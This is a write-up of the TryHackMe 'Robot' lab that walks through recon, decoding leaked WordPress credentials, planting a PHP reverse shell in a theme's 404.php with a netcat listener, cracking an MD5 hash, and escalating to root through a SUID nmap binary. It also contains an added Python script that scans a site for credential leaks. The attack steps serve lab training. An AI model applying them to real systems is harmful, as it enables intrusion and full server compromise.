TryHackMe Mr Robot Walkthrough - Pentest Lab Notes

🤖 TryHackMe: Robot Room - Walkthrough

Welcome to the walkthrough of the Robot room on TryHackMe, inspired by the Mr. Robot TV series. This lab focuses on web enumeration, WordPress exploitation, hash cracking, and privilege escalation techniques.


🧠 Room Information

  • Platform: TryHackMe
  • Room Name: Robot
  • Difficulty: Easy–Intermediate
  • Skills Covered:
    • Web Enumeration
    • WordPress Vulnerabilities
    • Password Hash Cracking
    • Shell Access
    • Privilege Escalation

Recon & Enumeration

```
nmap -sC -sV -Pn <TARGET_IP>
nmap -A <TARGET_IP>
```

Discovered Open Ports:

80/tcp — HTTP

443/tcp — HTTPS

Directory Brute Forcing:

```
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

Interesting Endpoints:

/robots.txt

/license

/wp-login.php

🚩 Flag 1 - Found in robots.txt

Accessing /robots.txt shows:

```
User-agent: *
Disallow: /key-1-of-3.txt
```

Visiting that file reveals:

073403c8———————

Credential Discovery

From /license, we find a Base64-encoded string. Decoding:

```
echo 'R________________Mg==' | base64 -d
```

Reveals credentials:

elliot:ER28——2
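Both leaks so far (a file path advertised in robots.txt, and Base64-encoded credentials in /license) can be caught by scanning a site's public files before they are published. The following is an added example, not part of the original walkthrough; the function names and the sample site content are constructed for illustration.

```python
import base64
import re

# Candidate Base64 runs: 16+ alphabet characters, optional padding.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Decoded text shaped like "user:password".
CRED_SHAPE = re.compile(r"[A-Za-z0-9._-]{1,32}:[\x21-\x7e]{4,}")
# robots.txt rule naming one file (has an extension) rather than a directory.
DISALLOWED_FILE = re.compile(r"^[ \t]*Disallow:[ \t]*(/\S*\.[A-Za-z0-9]{1,5})[ \t]*$", re.I | re.M)


def find_encoded_credentials(text):
    """Return Base64 tokens whose decoded form looks like user:password."""
    hits = []
    for token in B64_TOKEN.findall(text):
        try:
            # validate=True rejects bad padding and non-alphabet characters.
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if CRED_SHAPE.fullmatch(decoded.strip()):
            hits.append(token)
    return hits


def find_advertised_files(robots_txt):
    return DISALLOWED_FILE.findall(robots_txt)


def audit(site):
    """site maps URL path -> body text; returns (path, issue, evidence) tuples."""
    findings = []
    for path, body in site.items():
        if path.endswith("robots.txt"):
            findings += [(path, "file named in Disallow", f) for f in find_advertised_files(body)]
        findings += [(path, "Base64 decodes to user:password", t) for t in find_encoded_credentials(body)]
    return findings


# Constructed sample content (not taken from the room).
SAMPLE_TOKEN = base64.b64encode(b"alice:Sample-Passw0rd").decode()
SAMPLE_SITE = {
    "/robots.txt": "User-agent: *\nDisallow: /wp-admin/\nDisallow: /backup-notes.txt\n",
    "/license": "Sample license text.\n" + SAMPLE_TOKEN + "\n",
    "/readme.html": "build " + base64.b64encode(b"ABCDEFGHIJKLMNOP").decode() + "\n",
}

if __name__ == "__main__":
    for finding in audit(SAMPLE_SITE):
        print(finding)
```

The directory rule and the Base64 string that does not decode to a user:password shape are deliberately left unflagged, so the output stays limited to the two kinds of leak seen in this room.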

💥 WordPress Exploitation

Log into /wp-login.php using Elliot's credentials.

Go to Appearance → Theme Editor.

Modify the 404.php template with a PHP reverse shell.

Start listener:

```
nc -lvnp 4444
```

Trigger shell by visiting a nonexistent URL.

🧠 Shell Access & Enumeration

Stabilize shell:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Found key-2-of-3.txt in /home/robot/ (not readable).

Also found password.raw-md5:

c3fcd3d76192e————–3b

Cracked using CrackStation: ➡️ Password = abcdefghijklmnopqrstuvwxyz

Switch to robot:

```
su robot
```

Now access:

822c73956—————-9f959

⚙️ Privilege Escalation

Check for SUID files:

```
find / -perm -4000 -type f 2>/dev/null
```

Found: /usr/local/bin/nmap

Interactive Nmap exploit (via GTFOBins):

```
nmap --interactive
!sh
```

Now root! 🚀

Final Flag

Read /root/key-3-of-3.txt:

📚 Tools & Resources Used

Nmap

Gobuster

CrackStation

GTFOBins

PentestMonkey PHP Shell

✍️ Author

Your nikhil


This post is licensed under CC BY 4.0 by the author.